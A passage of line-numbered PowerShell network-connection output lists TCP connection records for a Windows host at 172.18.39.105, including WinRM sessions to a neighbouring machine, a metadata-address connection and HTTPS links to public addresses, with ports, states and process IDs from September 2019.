8430LocalPort : 50765
8431OwningProcess : 3260
8432AppliedSetting : Internet
8433OffloadState : InHost
8434RemoteAddress : 169.254.169.254
8435RemotePort : 80
8436State : CloseWait
8437PSComputerName :
8438
8439
8440Caption :
8441Description :
8442ElementName :
8443InstanceID : 172.18.39.105++50764++52.158.208.111++443
8444CommunicationStatus :
8445DetailedStatus :
8446HealthState :
8447InstallDate :
8448Name :
8449OperatingStatus :
8450OperationalStatus :
8451PrimaryStatus :
8452Status :
8453StatusDescriptions :
8454AvailableRequestedStates :
8455EnabledDefault : 2
8456EnabledState :
8457OtherEnabledState :
8458RequestedState : 5
8459TimeOfLastStateChange :
8460TransitioningToState : 12
8461AggregationBehavior :
8462Directionality :
8463CreationTime : 12/31/1600 4:00:00 PM
8464LocalAddress : 172.18.39.105
8465LocalPort : 50764
8466OwningProcess : 0
8467AppliedSetting :
8468OffloadState : InHost
8469RemoteAddress : 52.158.208.111
8470RemotePort : 443
8471State : TimeWait
8472PSComputerName :
8473
8474
8475Caption :
8476Description :
8477ElementName :
8478InstanceID : 172.18.39.105++50763++40.90.137.125++443
8479CommunicationStatus :
8480DetailedStatus :
8481HealthState :
8482InstallDate :
8483Name :
8484OperatingStatus :
8485OperationalStatus :
8486PrimaryStatus :
8487Status :
8488StatusDescriptions :
8489AvailableRequestedStates :
8490EnabledDefault : 2
8491EnabledState :
8492OtherEnabledState :
8493RequestedState : 5
8494TimeOfLastStateChange :
8495TransitioningToState : 12
8496AggregationBehavior :
8497Directionality :
8498CreationTime : 9/3/2019 4:03:51 AM
8499LocalAddress : 172.18.39.105
8500LocalPort : 50763
8501OwningProcess : 4268
8502AppliedSetting : Internet
8503OffloadState : InHost
8504RemoteAddress : 40.90.137.125
8505RemotePort : 443
8506State : Established
8507PSComputerName :
8508
8509
8510Caption :
8511Description :
8512ElementName :
8513InstanceID : 172.18.39.105++50762++172.18.39.102++5985
8514CommunicationStatus :
8515DetailedStatus :
8516HealthState :
8517InstallDate :
8518Name :
8519OperatingStatus :
8520OperationalStatus :
8521PrimaryStatus :
8522Status :
8523StatusDescriptions :
8524AvailableRequestedStates :
8525EnabledDefault : 2
8526EnabledState :
8527OtherEnabledState :
8528RequestedState : 5
8529TimeOfLastStateChange :
8530TransitioningToState : 12
8531AggregationBehavior :
8532Directionality :
8533CreationTime : 9/3/2019 4:03:51 AM
8534LocalAddress : 172.18.39.105
8535LocalPort : 50762
8536OwningProcess : 4496
8537AppliedSetting : Internet
8538OffloadState : InHost
8539RemoteAddress : 172.18.39.102
8540RemotePort : 5985
8541State : Established
8542PSComputerName :
8543
8544
8545Caption :
8546Description :
8547ElementName :
8548InstanceID : 172.18.39.105++50760++172.18.39.102++5985
8549CommunicationStatus :
8550DetailedStatus :
8551HealthState :
8552InstallDate :
8553Name :
8554OperatingStatus :
8555OperationalStatus :
8556PrimaryStatus :
8557Status :
8558StatusDescriptions :
8559AvailableRequestedStates :
8560EnabledDefault : 2
8561EnabledState :
8562OtherEnabledState :
8563RequestedState : 5
8564TimeOfLastStateChange :
8565TransitioningToState : 12
8566AggregationBehavior :
8567Directionality :
8568CreationTime : 9/3/2019 4:03:51 AM
8569LocalAddress : 172.18.39.105
8570LocalPort : 50760
8571OwningProcess : 4496
8572AppliedSetting : Internet
8573OffloadState : InHost
8574RemoteAddress : 172.18.39.102
8575RemotePort : 5985
8576State : Established
8577PSComputerName :
8578
8579
8580Caption :
8581Description :
8582ElementName :
8583InstanceID : 172.18.39.105++50758++172.18.39.102++5985
8584CommunicationStatus :
8585DetailedStatus :
8586HealthState :
8587InstallDate :
8588Name :
8589OperatingStatus :
8590OperationalStatus :
8591PrimaryStatus :
8592Status :
8593StatusDescriptions :
8594AvailableRequestedStates :
8595EnabledDefault : 2
8596EnabledState :
8597OtherEnabledState :
8598RequestedState : 5
8599TimeOfLastStateChange :
8600TransitioningToState : 12
8601AggregationBehavior :
8602Directionality :
8603CreationTime : 9/3/2019 4:03:51 AM
8604LocalAddress : 172.18.39.105
8605LocalPort : 50758
8606OwningProcess : 4496
8607AppliedSetting : Internet
8608OffloadState : InHost
8609RemoteAddress : 172.18.39.102
8610RemotePort : 5985
8611State : Established
8612PSComputerName :
8613
8614
8615Caption :
8616Description :
8617ElementName :
8618InstanceID : 172.18.39.105++50756++172.18.39.102++5985
8619CommunicationStatus :
8620DetailedStatus :
8621HealthState :
8622InstallDate :
8623Name :
8624OperatingStatus :
8625OperationalStatus :
8626PrimaryStatus :
8627Status :
8628StatusDescriptions :
8629AvailableRequestedStates :
8630EnabledDefault : 2
8631EnabledState :
8632OtherEnabledState :
8633RequestedState : 5
8634TimeOfLastStateChange :
8635TransitioningToState : 12
8636AggregationBehavior :
8637Directionality :
8638CreationTime : 9/3/2019 4:03:51 AM
8639LocalAddress : 172.18.39.105
8640LocalPort : 50756
8641OwningProcess : 4496
8642AppliedSetting : Internet
8643OffloadState : InHost
8644RemoteAddress : 172.18.39.102
8645RemotePort : 5985
8646State : Established
8647PSComputerName :
8648
8649
8650Caption :
8651Description :
8652ElementName :
8653InstanceID : 172.18.39.105++50754++104.92.135.151++80
8654CommunicationStatus :
8655DetailedStatus :
8656HealthState :
8657InstallDate :
8658Name :
8659OperatingStatus :
8660OperationalStatus :
8661PrimaryStatus :
8662Status :
8663StatusDescriptions :
8664AvailableRequestedStates :
8665EnabledDefault : 2
8666EnabledState :
8667OtherEnabledState :
8668RequestedState : 5
8669TimeOfLastStateChange :
8670TransitioningToState : 12
8671AggregationBehavior :
8672Directionality :
8673CreationTime : 9/3/2019 4:03:50 AM
8674LocalAddress : 172.18.39.105
8675LocalPort : 50754
8676OwningProcess : 5348
8677AppliedSetting : Internet
8678OffloadState : InHost
8679RemoteAddress : 104.92.135.151
8680RemotePort : 80
8681State : Established
8682PSComputerName :
8683
8684
8685Caption :
8686Description :
8687ElementName :
8688InstanceID : 172.18.39.105++50753++96.16.173.242++80
8689CommunicationStatus :
8690DetailedStatus :
8691HealthState :
8692InstallDate :
8693Name :
8694OperatingStatus :
8695OperationalStatus :
8696PrimaryStatus :
8697Status :
8698StatusDescriptions :
8699AvailableRequestedStates :
8700EnabledDefault : 2
8701EnabledState :
8702OtherEnabledState :
8703RequestedState : 5
8704TimeOfLastStateChange :
8705TransitioningToState : 12
8706AggregationBehavior :
8707Directionality :
8708CreationTime : 9/3/2019 4:03:50 AM
8709LocalAddress : 172.18.39.105
8710LocalPort : 50753
8711OwningProcess : 5348
8712AppliedSetting : Internet
8713OffloadState : InHost
8714RemoteAddress : 96.16.173.242
8715RemotePort : 80
8716State : Established
8717PSComputerName :
8718
8719
8720Caption :
8721Description :
8722ElementName :
8723InstanceID : 172.18.39.105++50752++172.18.39.5++49667
8724CommunicationStatus :
8725DetailedStatus :
8726HealthState :
8727InstallDate :
8728Name :
8729OperatingStatus :
8730OperationalStatus :
8731PrimaryStatus :
8732Status :
8733StatusDescriptions :
8734AvailableRequestedStates :
8735EnabledDefault : 2
8736EnabledState :
8737OtherEnabledState :
8738RequestedState : 5
8739TimeOfLastStateChange :
8740TransitioningToState : 12
8741AggregationBehavior :
8742Directionality :
8743CreationTime : 12/31/1600 4:00:00 PM
8744LocalAddress : 172.18.39.105
8745LocalPort : 50752
8746OwningProcess : 0
8747AppliedSetting :
8748OffloadState : InHost
8749RemoteAddress : 172.18.39.5
8750RemotePort : 49667
8751State : TimeWait
8752PSComputerName :
8753
8754
8755Caption :
8756Description :
8757ElementName :
8758InstanceID : 172.18.39.105++50751++172.18.39.5++135
8759CommunicationStatus :
8760DetailedStatus :
8761HealthState :
8762InstallDate :
8763Name :
8764OperatingStatus :
8765OperationalStatus :
8766PrimaryStatus :
8767Status :
8768StatusDescriptions :
8769AvailableRequestedStates :
8770EnabledDefault : 2
8771EnabledState :
8772OtherEnabledState :
8773RequestedState : 5
8774TimeOfLastStateChange :
8775TransitioningToState : 12
8776AggregationBehavior :
8777Directionality :
8778CreationTime : 12/31/1600 4:00:00 PM
8779LocalAddress : 172.18.39.105
8780LocalPort : 50751
8781OwningProcess : 0
8782AppliedSetting :
8783OffloadState : InHost
8784RemoteAddress : 172.18.39.5
8785RemotePort : 135
8786State : TimeWait
8787PSComputerName :
8788
8789
8790Caption :
8791Description :
8792ElementName :
8793InstanceID : 172.18.39.105++50750++172.18.39.102++5985
8794CommunicationStatus :
8795DetailedStatus :
8796HealthState :
8797InstallDate :
8798Name :
8799OperatingStatus :
8800OperationalStatus :
8801PrimaryStatus :
8802Status :
8803StatusDescriptions :
8804AvailableRequestedStates :
8805EnabledDefault : 2
8806EnabledState :
8807OtherEnabledState :
8808RequestedState : 5
8809TimeOfLastStateChange :
8810TransitioningToState : 12
8811AggregationBehavior :
8812Directionality :
8813CreationTime : 9/3/2019 4:03:40 AM
8814LocalAddress : 172.18.39.105
8815LocalPort : 50750
8816OwningProcess : 4496
8817AppliedSetting : Internet
8818OffloadState : InHost
8819RemoteAddress : 172.18.39.102
8820RemotePort : 5985
8821State : Established
8822PSComputerName :
8823
8824
8825Caption :
8826Description :
8827ElementName :
8828InstanceID : 172.18.39.105++50747++172.18.39.102++5985
8829CommunicationStatus :
8830DetailedStatus :
8831HealthState :
8832InstallDate :
8833Name :
8834OperatingStatus :
8835OperationalStatus :
8836PrimaryStatus :
8837Status :
8838StatusDescriptions :
8839AvailableRequestedStates :
8840EnabledDefault : 2
8841EnabledState :
8842OtherEnabledState :
8843RequestedState : 5
8844TimeOfLastStateChange :
8845TransitioningToState : 12
8846AggregationBehavior :
8847Directionality :
8848CreationTime : 12/31/1600 4:00:00 PM
8849LocalAddress : 172.18.39.105
8850LocalPort : 50747
8851OwningProcess : 0
8852AppliedSetting :
8853OffloadState : InHost
8854RemoteAddress : 172.18.39.102
8855RemotePort : 5985
8856State : TimeWait
8857PSComputerName :
8858
8859
8860Caption :
8861Description :
8862ElementName :
8863InstanceID : 172.18.39.105++50742++172.18.39.102++5985
8864CommunicationStatus :
8865DetailedStatus :
8866HealthState :
8867InstallDate :
8868Name :
8869OperatingStatus :
8870OperationalStatus :
8871PrimaryStatus :
8872Status :
8873StatusDescriptions :
8874AvailableRequestedStates :
8875EnabledDefault : 2
8876EnabledState :
8877OtherEnabledState :
8878RequestedState : 5
8879TimeOfLastStateChange :
8880TransitioningToState : 12
8881AggregationBehavior :
8882Directionality :
8883CreationTime : 9/3/2019 4:02:36 AM
8884LocalAddress : 172.18.39.105
8885LocalPort : 50742
8886OwningProcess : 4496
8887AppliedSetting : Internet
8888OffloadState : InHost
8889RemoteAddress : 172.18.39.102
8890RemotePort : 5985
8891State : Established
8892PSComputerName :
8893
8894
8895Caption :
8896Description :
8897ElementName :
8898InstanceID : 172.18.39.105++50740++172.18.39.102++5985
8899CommunicationStatus :
8900DetailedStatus :
8901HealthState :
8902InstallDate :
8903Name :
8904OperatingStatus :
8905OperationalStatus :
8906PrimaryStatus :
8907Status :
8908StatusDescriptions :
8909AvailableRequestedStates :
8910EnabledDefault : 2
8911EnabledState :
8912OtherEnabledState :
8913RequestedState : 5
8914TimeOfLastStateChange :
8915TransitioningToState : 12
8916AggregationBehavior :
8917Directionality :
8918CreationTime : 9/3/2019 4:02:35 AM
8919LocalAddress : 172.18.39.105
8920LocalPort : 50740
8921OwningProcess : 4496
8922AppliedSetting : Internet
8923OffloadState : InHost
8924RemoteAddress : 172.18.39.102
8925RemotePort : 5985
8926State : Established
8927PSComputerName :
8928
8929
8930Caption :
8931Description :
8932ElementName :
8933InstanceID : 172.18.39.105++50738++172.18.39.102++5985
8934CommunicationStatus :
8935DetailedStatus :
8936HealthState :
8937InstallDate :
8938Name :
8939OperatingStatus :
8940OperationalStatus :
8941PrimaryStatus :
8942Status :
8943StatusDescriptions :
8944AvailableRequestedStates :
8945EnabledDefault : 2
8946EnabledState :
8947OtherEnabledState :
8948RequestedState : 5
8949TimeOfLastStateChange :
8950TransitioningToState : 12
8951AggregationBehavior :
8952Directionality :
8953CreationTime : 12/31/1600 4:00:00 PM
8954LocalAddress : 172.18.39.105
8955LocalPort : 50738
8956OwningProcess : 0
8957AppliedSetting :
8958OffloadState : InHost
8959RemoteAddress : 172.18.39.102
8960RemotePort : 5985
8961State : TimeWait
8962PSComputerName :
8963
8964
8965Caption :
8966Description :
8967ElementName :
8968InstanceID : 172.18.39.105++50737++216.58.195.78++443
8969CommunicationStatus :
8970DetailedStatus :
8971HealthState :
8972InstallDate :
8973Name :
8974OperatingStatus :
8975OperationalStatus :
8976PrimaryStatus :
8977Status :
8978StatusDescriptions :
8979AvailableRequestedStates :
8980EnabledDefault : 2
8981EnabledState :
8982OtherEnabledState :
8983RequestedState : 5
8984TimeOfLastStateChange :
8985TransitioningToState : 12
8986AggregationBehavior :
8987Directionality :
8988CreationTime : 9/3/2019 4:02:03 AM
8989LocalAddress : 172.18.39.105
8990LocalPort : 50737
8991OwningProcess : 7344
8992AppliedSetting : Internet
8993OffloadState : InHost
8994RemoteAddress : 216.58.195.78
8995RemotePort : 443
8996State : Established
8997PSComputerName :
8998
8999
9000Caption :
9001Description :
9002ElementName :
9003InstanceID : 172.18.39.105++50699++172.217.5.99++443
9004CommunicationStatus :
9005DetailedStatus :
9006HealthState :
9007InstallDate :
9008Name :
9009OperatingStatus :
9010OperationalStatus :
9011PrimaryStatus :
9012Status :
9013StatusDescriptions :
9014AvailableRequestedStates :
9015EnabledDefault : 2
9016EnabledState :
9017OtherEnabledState :
9018RequestedState : 5
9019TimeOfLastStateChange :
9020TransitioningToState : 12
9021AggregationBehavior :
9022Directionality :
9023CreationTime : 9/3/2019 4:00:42 AM
9024LocalAddress : 172.18.39.105
9025LocalPort : 50699
9026OwningProcess : 7344
9027AppliedSetting : Internet
9028OffloadState : InHost
9029RemoteAddress : 172.217.5.99
9030RemotePort : 443
9031State : Established
9032PSComputerName :
9033
9034
9035Caption :
9036Description :
9037ElementName :
9038InstanceID : 172.18.39.105++50697++216.58.194.174++443
9039CommunicationStatus :
9040DetailedStatus :
9041HealthState :
9042InstallDate :
9043Name :
9044OperatingStatus :
9045OperationalStatus :
9046PrimaryStatus :
9047Status :
9048StatusDescriptions :
9049AvailableRequestedStates :
9050EnabledDefault : 2
9051EnabledState :
9052OtherEnabledState :
9053RequestedState : 5
9054TimeOfLastStateChange :
9055TransitioningToState : 12
9056AggregationBehavior :
9057Directionality :
9058CreationTime : 9/3/2019 4:00:40 AM
9059LocalAddress : 172.18.39.105
9060LocalPort : 50697
9061OwningProcess : 7344
9062AppliedSetting : Internet
9063OffloadState : InHost
9064RemoteAddress : 216.58.194.174
9065RemotePort : 443
9066State : Established
9067PSComputerName :
9068
9069
9070Caption :
9071Description :
9072ElementName :
9073InstanceID : 172.18.39.105++50694++172.217.164.106++443
9074CommunicationStatus :
9075DetailedStatus :
9076HealthState :
9077InstallDate :
9078Name :
9079OperatingStatus :
9080OperationalStatus :
9081PrimaryStatus :
9082Status :
9083StatusDescriptions :
9084AvailableRequestedStates :
9085EnabledDefault : 2
9086EnabledState :
9087OtherEnabledState :
9088RequestedState : 5
9089TimeOfLastStateChange :
9090TransitioningToState : 12
9091AggregationBehavior :
9092Directionality :
9093CreationTime : 9/3/2019 4:00:38 AM
9094LocalAddress : 172.18.39.105
9095LocalPort : 50694
9096OwningProcess : 7344
9097AppliedSetting : Internet
9098OffloadState : InHost
9099RemoteAddress : 172.217.164.106
9100RemotePort : 443
9101State : Established
9102PSComputerName :
9103
9104
9105Caption :
9106Description :
9107ElementName :
9108InstanceID : 172.18.39.105++50687++172.217.0.46++80
9109CommunicationStatus :
9110DetailedStatus :
9111HealthState :
9112InstallDate :
9113Name :
9114OperatingStatus :
9115OperationalStatus :
9116PrimaryStatus :
9117Status :
9118StatusDescriptions :
9119AvailableRequestedStates :
9120EnabledDefault : 2
9121EnabledState :
9122OtherEnabledState :
9123RequestedState : 5
9124TimeOfLastStateChange :
9125TransitioningToState : 12
9126AggregationBehavior :
9127Directionality :
9128CreationTime : 9/3/2019 4:00:37 AM
9129LocalAddress : 172.18.39.105
9130LocalPort : 50687
9131OwningProcess : 7344
9132AppliedSetting : Internet
9133OffloadState : InHost
9134RemoteAddress : 172.217.0.46
9135RemotePort : 80
9136State : Established
9137PSComputerName :
9138
9139
9140Caption :
9141Description :
9142ElementName :
9143InstanceID : 172.18.39.105++50686++172.217.164.97++443
9144CommunicationStatus :
9145DetailedStatus :
9146HealthState :
9147InstallDate :
9148Name :
9149OperatingStatus :
9150OperationalStatus :
9151PrimaryStatus :
9152Status :
9153StatusDescriptions :
9154AvailableRequestedStates :
9155EnabledDefault : 2
9156EnabledState :
9157OtherEnabledState :
9158RequestedState : 5
9159TimeOfLastStateChange :
9160TransitioningToState : 12
9161AggregationBehavior :
9162Directionality :
9163CreationTime : 9/3/2019 4:00:37 AM
9164LocalAddress : 172.18.39.105
9165LocalPort : 50686
9166OwningProcess : 7344
9167AppliedSetting : Internet
9168OffloadState : InHost
9169RemoteAddress : 172.217.164.97
9170RemotePort : 443
9171State : Established
9172PSComputerName :
9173
9174
9175Caption :
9176Description :
9177ElementName :
9178InstanceID : 172.18.39.105++50684++172.217.0.36++443
9179CommunicationStatus :
9180DetailedStatus :
9181HealthState :
9182InstallDate :
9183Name :
9184OperatingStatus :
9185OperationalStatus :
9186PrimaryStatus :
9187Status :
9188StatusDescriptions :
9189AvailableRequestedStates :
9190EnabledDefault : 2
9191EnabledState :
9192OtherEnabledState :
9193RequestedState : 5
9194TimeOfLastStateChange :
9195TransitioningToState : 12
9196AggregationBehavior :
9197Directionality :
9198CreationTime : 9/3/2019 4:00:37 AM
9199LocalAddress : 172.18.39.105
9200LocalPort : 50684
9201OwningProcess : 7344
9202AppliedSetting : Internet
9203OffloadState : InHost
9204RemoteAddress : 172.217.0.36
9205RemotePort : 443
9206State : Established
9207PSComputerName :
9208
9209
9210Caption :
9211Description :
9212ElementName :
9213InstanceID : 172.18.39.105++50683++172.217.6.78++443
9214CommunicationStatus :
9215DetailedStatus :
9216HealthState :
9217InstallDate :
9218Name :
9219OperatingStatus :
9220OperationalStatus :
9221PrimaryStatus :
9222Status :
9223StatusDescriptions :
9224AvailableRequestedStates :
9225EnabledDefault : 2
9226EnabledState :
9227OtherEnabledState :
9228RequestedState : 5
9229TimeOfLastStateChange :
9230TransitioningToState : 12
9231AggregationBehavior :
9232Directionality :
9233CreationTime : 9/3/2019 4:00:36 AM
9234LocalAddress : 172.18.39.105
9235LocalPort : 50683
9236OwningProcess : 7344
9237AppliedSetting : Internet
9238OffloadState : InHost
9239RemoteAddress : 172.217.6.78
9240RemotePort : 443
9241State : Established
9242PSComputerName :
9243
9244
9245Caption :
9246Description :
9247ElementName :
9248InstanceID : 172.18.39.105++50682++172.217.164.109++443
9249CommunicationStatus :
9250DetailedStatus :
9251HealthState :
9252InstallDate :
9253Name :
9254OperatingStatus :
9255OperationalStatus :
9256PrimaryStatus :
9257Status :
9258StatusDescriptions :
9259AvailableRequestedStates :
9260EnabledDefault : 2
9261EnabledState :
9262OtherEnabledState :
9263RequestedState : 5
9264TimeOfLastStateChange :
9265TransitioningToState : 12
9266AggregationBehavior :
9267Directionality :
9268CreationTime : 9/3/2019 4:00:36 AM
9269LocalAddress : 172.18.39.105
9270LocalPort : 50682
9271OwningProcess : 7344
9272AppliedSetting : Internet
9273OffloadState : InHost
9274RemoteAddress : 172.217.164.109
9275RemotePort : 443
9276State : Established
9277PSComputerName :
9278
9279
9280Caption :
9281Description :
9282ElementName :
9283InstanceID : 172.18.39.105++50681++172.217.164.99++443
9284CommunicationStatus :
9285DetailedStatus :
9286HealthState :
9287InstallDate :
9288Name :
9289OperatingStatus :
9290OperationalStatus :
9291PrimaryStatus :
9292Status :
9293StatusDescriptions :
9294AvailableRequestedStates :
9295EnabledDefault : 2
9296EnabledState :
9297OtherEnabledState :
9298RequestedState : 5
9299TimeOfLastStateChange :
9300TransitioningToState : 12
9301AggregationBehavior :
9302Directionality :
9303CreationTime : 9/3/2019 4:00:36 AM
9304LocalAddress : 172.18.39.105
9305LocalPort : 50681
9306OwningProcess : 7344
9307AppliedSetting : Internet
9308OffloadState : InHost
9309RemoteAddress : 172.217.164.99
9310RemotePort : 443
9311State : Established
9312PSComputerName :
9313
9314
9315Caption :
9316Description :
9317ElementName :
9318InstanceID : 172.18.39.105++50680++172.217.0.35++443
9319CommunicationStatus :
9320DetailedStatus :
9321HealthState :
9322InstallDate :
9323Name :
9324OperatingStatus :
9325OperationalStatus :
9326PrimaryStatus :
9327Status :
9328StatusDescriptions :
9329AvailableRequestedStates :
9330EnabledDefault : 2
9331EnabledState :
9332OtherEnabledState :
9333RequestedState : 5
9334TimeOfLastStateChange :
9335TransitioningToState : 12
9336AggregationBehavior :
9337Directionality :
9338CreationTime : 9/3/2019 4:00:36 AM
9339LocalAddress : 172.18.39.105
9340LocalPort : 50680
9341OwningProcess : 7344
9342AppliedSetting : Internet
9343OffloadState : InHost
9344RemoteAddress : 172.217.0.35
9345RemotePort : 443
9346State : Established
9347PSComputerName :
9348
9349
9350Caption :
9351Description :
9352ElementName :
9353InstanceID : 172.18.39.105++50649++54.77.209.233++443
9354CommunicationStatus :
9355DetailedStatus :
9356HealthState :
9357InstallDate :
9358Name :
9359OperatingStatus :
9360OperationalStatus :
9361PrimaryStatus :
9362Status :
9363StatusDescriptions :
9364AvailableRequestedStates :
9365EnabledDefault : 2
9366EnabledState :
9367OtherEnabledState :
9368RequestedState : 5
9369TimeOfLastStateChange :
9370TransitioningToState : 12
9371AggregationBehavior :
9372Directionality :
9373CreationTime : 9/3/2019 3:56:58 AM
9374LocalAddress : 172.18.39.105
9375LocalPort : 50649
9376OwningProcess : 8996
9377AppliedSetting : Internet
9378OffloadState : InHost
9379RemoteAddress : 54.77.209.233
9380RemotePort : 443
9381State : Established
9382PSComputerName :
9383
9384
9385Caption :
9386Description :
9387ElementName :
9388InstanceID : 172.18.39.105++50464++54.77.209.233++443
9389CommunicationStatus :
9390DetailedStatus :
9391HealthState :
9392InstallDate :
9393Name :
9394OperatingStatus :
9395OperationalStatus :
9396PrimaryStatus :
9397Status :
9398StatusDescriptions :
9399AvailableRequestedStates :
9400EnabledDefault : 2
9401EnabledState :
9402OtherEnabledState :
9403RequestedState : 5
9404TimeOfLastStateChange :
9405TransitioningToState : 12
9406AggregationBehavior :
9407Directionality :
9408CreationTime : 9/3/2019 3:39:29 AM
9409LocalAddress : 172.18.39.105
9410LocalPort : 50464
9411OwningProcess : 3376
9412AppliedSetting : Internet
9413OffloadState : InHost
9414RemoteAddress : 54.77.209.233
9415RemotePort : 443
9416State : Established
9417PSComputerName :
9418
9419
9420Caption :
9421Description :
9422ElementName :
9423InstanceID : 172.18.39.105++50449++34.251.232.252++443
9424CommunicationStatus :
9425DetailedStatus :
9426HealthState :
9427InstallDate :
9428Name :
9429OperatingStatus :
9430OperationalStatus :
9431PrimaryStatus :
9432Status :
9433StatusDescriptions :
9434AvailableRequestedStates :
9435EnabledDefault : 2
9436EnabledState :
9437OtherEnabledState :
9438RequestedState : 5
9439TimeOfLastStateChange :
9440TransitioningToState : 12
9441AggregationBehavior :
9442Directionality :
9443CreationTime : 9/3/2019 3:38:20 AM
9444LocalAddress : 172.18.39.105
9445LocalPort : 50449
9446OwningProcess : 5932
9447AppliedSetting : Internet
9448OffloadState : InHost
9449RemoteAddress : 34.251.232.252
9450RemotePort : 443
9451State : CloseWait
9452PSComputerName :
9453
9454
9455Caption :
9456Description :
9457ElementName :
9458InstanceID : 127.0.0.1++50448++127.0.0.1++50447
9459CommunicationStatus :
9460DetailedStatus :
9461HealthState :
9462InstallDate :
9463Name :
9464OperatingStatus :
9465OperationalStatus :
9466PrimaryStatus :
9467Status :
9468StatusDescriptions :
9469AvailableRequestedStates :
9470EnabledDefault : 2
9471EnabledState :
9472OtherEnabledState :
9473RequestedState : 5
9474TimeOfLastStateChange :
9475TransitioningToState : 12
9476AggregationBehavior :
9477Directionality :
9478CreationTime : 9/3/2019 3:38:20 AM
9479LocalAddress : 127.0.0.1
9480LocalPort : 50448
9481OwningProcess : 5932
9482AppliedSetting : Internet
9483OffloadState : InHost
9484RemoteAddress : 127.0.0.1
9485RemotePort : 50447
9486State : Established
9487PSComputerName :
9488
9489
9490Caption :
9491Description :
9492ElementName :
9493InstanceID : 127.0.0.1++50447++127.0.0.1++50448
9494CommunicationStatus :
9495DetailedStatus :
9496HealthState :
9497InstallDate :
9498Name :
9499OperatingStatus :
9500OperationalStatus :
9501PrimaryStatus :
9502Status :
9503StatusDescriptions :
9504AvailableRequestedStates :
9505EnabledDefault : 2
9506EnabledState :
9507OtherEnabledState :
9508RequestedState : 5
9509TimeOfLastStateChange :
9510TransitioningToState : 12
9511AggregationBehavior :
9512Directionality :
9513CreationTime : 9/3/2019 3:38:20 AM
9514LocalAddress : 127.0.0.1
9515LocalPort : 50447
9516OwningProcess : 5932
9517AppliedSetting : Internet
9518OffloadState : InHost
9519RemoteAddress : 127.0.0.1
9520RemotePort : 50448
9521State : Established
9522PSComputerName :
9523
9524
9525Caption :
9526Description :
9527ElementName :
9528InstanceID : 172.18.39.105++50422++34.251.232.252++443
9529CommunicationStatus :
9530DetailedStatus :
9531HealthState :
9532InstallDate :
9533Name :
9534OperatingStatus :
9535OperationalStatus :
9536PrimaryStatus :
9537Status :
9538StatusDescriptions :
9539AvailableRequestedStates :
9540EnabledDefault : 2
9541EnabledState :
9542OtherEnabledState :
9543RequestedState : 5
9544TimeOfLastStateChange :
9545TransitioningToState : 12
9546AggregationBehavior :
9547Directionality :
9548CreationTime : 9/3/2019 3:35:52 AM
9549LocalAddress : 172.18.39.105
9550LocalPort : 50422
9551OwningProcess : 8204
9552AppliedSetting : Internet
9553OffloadState : InHost
9554RemoteAddress : 34.251.232.252
9555RemotePort : 443
9556State : Established
9557PSComputerName :
9558
9559
9560Caption :
9561Description :
9562ElementName :
9563InstanceID : 172.18.39.105++50326++52.242.211.89++443
9564CommunicationStatus :
9565DetailedStatus :
9566HealthState :
9567InstallDate :
9568Name :
9569OperatingStatus :
9570OperationalStatus :
9571PrimaryStatus :
9572Status :
9573StatusDescriptions :
9574AvailableRequestedStates :
9575EnabledDefault : 2
9576EnabledState :
9577OtherEnabledState :
9578RequestedState : 5
9579TimeOfLastStateChange :
9580TransitioningToState : 12
9581AggregationBehavior :
9582Directionality :
9583CreationTime : 9/3/2019 3:30:50 AM
9584LocalAddress : 172.18.39.105
9585LocalPort : 50326
9586OwningProcess : 2176
9587AppliedSetting : Internet
9588OffloadState : InHost
9589RemoteAddress : 52.242.211.89
9590RemotePort : 443
9591State : Established
9592PSComputerName :
9593
9594
9595Caption :
9596Description :
9597ElementName :
9598InstanceID : 172.18.39.105++49756++172.18.39.102++5985
9599CommunicationStatus :
9600DetailedStatus :
9601HealthState :
9602InstallDate :
9603Name :
9604OperatingStatus :
9605OperationalStatus :
9606PrimaryStatus :
9607Status :
9608StatusDescriptions :
9609AvailableRequestedStates :
9610EnabledDefault : 2
9611EnabledState :
9612OtherEnabledState :
9613RequestedState : 5
9614TimeOfLastStateChange :
9615TransitioningToState : 12
9616AggregationBehavior :
9617Directionality :
9618CreationTime : 9/3/2019 3:08:51 AM
9619LocalAddress : 172.18.39.105
9620LocalPort : 49756
9621OwningProcess : 4496
9622AppliedSetting : Internet
9623OffloadState : InHost
9624RemoteAddress : 172.18.39.102
9625RemotePort : 5985
9626State : Established
9627PSComputerName :
9628
9629
9630Caption :
9631Description :
9632ElementName :
9633InstanceID : 0.0.0.0++49714++0.0.0.0++0
9634CommunicationStatus :
9635DetailedStatus :
9636HealthState :
9637InstallDate :
9638Name :
9639OperatingStatus :
9640OperationalStatus :
9641PrimaryStatus :
9642Status :
9643StatusDescriptions :
9644AvailableRequestedStates :
9645EnabledDefault : 2
9646EnabledState :
9647OtherEnabledState :
9648RequestedState : 5
9649TimeOfLastStateChange :
9650TransitioningToState : 12
9651AggregationBehavior :
9652Directionality :
9653CreationTime : 9/3/2019 3:08:36 AM
9654LocalAddress : 0.0.0.0
9655LocalPort : 49714
9656OwningProcess : 780
9657AppliedSetting :
9658OffloadState : InHost
9659RemoteAddress : 0.0.0.0
9660RemotePort : 0
9661State : Listen
9662PSComputerName :
9663
9664
9665Caption :
9666Description :
9667ElementName :
9668InstanceID : 0.0.0.0++49708++0.0.0.0++0
9669CommunicationStatus :
9670DetailedStatus :
9671HealthState :
9672InstallDate :
9673Name :
9674OperatingStatus :
9675OperationalStatus :
9676PrimaryStatus :
9677Status :
9678StatusDescriptions :
9679AvailableRequestedStates :
9680EnabledDefault : 2
9681EnabledState :
9682OtherEnabledState :
9683RequestedState : 5
9684TimeOfLastStateChange :
9685TransitioningToState : 12
9686AggregationBehavior :
9687Directionality :
9688CreationTime : 9/3/2019 3:08:36 AM
9689LocalAddress : 0.0.0.0
9690LocalPort : 49708
9691OwningProcess : 728
9692AppliedSetting :
9693OffloadState : InHost
9694RemoteAddress : 0.0.0.0
9695RemotePort : 0
9696State : Listen
9697PSComputerName :
9698
9699
9700Caption :
9701Description :
9702ElementName :
9703InstanceID : 0.0.0.0++49705++0.0.0.0++0
9704CommunicationStatus :
9705DetailedStatus :
9706HealthState :
9707InstallDate :
9708Name :
9709OperatingStatus :
9710OperationalStatus :
9711PrimaryStatus :
9712Status :
9713StatusDescriptions :
9714AvailableRequestedStates :
9715EnabledDefault : 2
9716EnabledState :
9717OtherEnabledState :
9718RequestedState : 5
9719TimeOfLastStateChange :
9720TransitioningToState : 12
9721AggregationBehavior :
9722Directionality :
9723CreationTime : 9/3/2019 3:08:31 AM
9724LocalAddress : 0.0.0.0
9725LocalPort : 49705
9726OwningProcess : 2732
9727AppliedSetting :
9728OffloadState : InHost
9729RemoteAddress : 0.0.0.0
